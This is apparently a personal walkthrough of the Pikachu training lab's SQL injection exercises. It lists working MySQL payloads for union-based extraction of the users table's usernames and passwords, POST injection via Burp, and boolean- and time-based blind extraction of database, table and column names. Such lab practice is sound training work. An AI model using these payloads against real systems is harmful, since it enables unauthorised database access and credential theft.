I. GET injection
1. Enter ' and watch for a database error.
2. Try the "universal password" payloads (close the ' quote, or bypass it, etc.)
' or 1=1 -- qwe
1' or 1=1
1' and 1=1
1' or 1=1 -- qwe
1' and 1=1 -- qwe
' or '1'='1
(MySQL only treats -- as a comment when it is followed by whitespace, so keep the space before qwe; # works as a comment too.)
3. ORDER BY to find the number of columns
1' or 1=1 order by 2 -- qwe
(order by 2 works, order by 3 errors, so the query has 2 columns)
4. Find the echo (display) positions
1' and 1=2 union select 1,2 -- qwe
Both columns are echoed in the page, so both can be used as display positions.
5. Query the database name and version (information_schema only ships with MySQL 5.0 and later)
1' and 1=2 union select database(),version() -- qwe
6. Query the table names
1' and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() -- qwe
username is usually in the users table.
7. Query the column names
1' and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='users' -- qwe
8. Query username
1' and 1=2 union select username,password from users -- qwe
The first time I did this kind of challenge, out of habit I assumed I had to find a flag, spent ages on it and went through half the data before it dawned on me that finding the username was enough.
II. POST injection
Capture the request in Burp
or 1=1
Note: requests to 127.0.0.1 do not show up in Burp, because the browser sends localhost traffic directly instead of through the proxy; replace 127.0.0.1 with your machine's own IP address and the request is captured.
III. Boolean-based blind injection
The hint says there is an admin user; I tried it and got nowhere. After searching I saw that kobe works (I don't understand why admin doesn't, and changing the and to or in the payloads below doesn't work either).
1.kobe' and 1=1 #
kobe' and 1=1 -- qwe
2. Database name length
kobe' and length(database())=7 #
3. Capture the request and brute-force the database name (send it to Intruder; 222 is the placeholder to mark as the payload position, the real range for printable characters is 32-126)
kobe' and ascii(substr(database(),1,1))=222 #
database: pikachu
4. Table name length. Note that users is not the first table! (try different limit offsets and check what each table name is)
kobe' and length((select table_name from information_schema.tables where table_schema=database() limit 3,1))=5 #
5. Table name
kobe' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))=222 #
users
6. Column name length
kobe' and length((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1))=8 #
7. Column name
kobe' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),1,1))=222 #
username
8. Query the data
kobe' and length((select username from users limit 0,1))=5 #
kobe' and ascii(substr((select username from users limit 0,1),1,1))=222 #
admin
kobe' and length((select username from users limit 1,1))=7 #
kobe' and ascii(substr((select username from users limit 1,1),1,1))=222 #
pikachu
...
IV. Time-based blind injection ??
1. Confirm the injection works (the response should take about 5 seconds longer)
' or if(1=1,sleep(5),1) -- qwe
Note: with ' or ..., the if() is evaluated for every row of the table, so the total delay is sleep() multiplied by the row count; choose the sleep value and the timeout with that in mind.
2. Database name
' or if(length(database())=7,sleep(5),1) -- qwe
' or if(ascii(substr(database(),2,1))=1122,sleep(2),1) -- qwe   (capture the request and brute-force in Intruder; 1122 is the placeholder, the real range is 32-126)
3. Table names
' or if(length((select table_name from information_schema.tables where table_schema=database() limit 1,1))>1,sleep(1),1) -- qwe
' or if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=1111,sleep(2),1) -- qwe
8
6
4. Column names
' or if(length((select column_name from information_schema.columns where table_schema=database() and table_name='' limit 0,1))>1,sleep(2),1) -- qwe
' or if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='' limit 0,1),1,1))=1111,sleep(2),1) -- qwe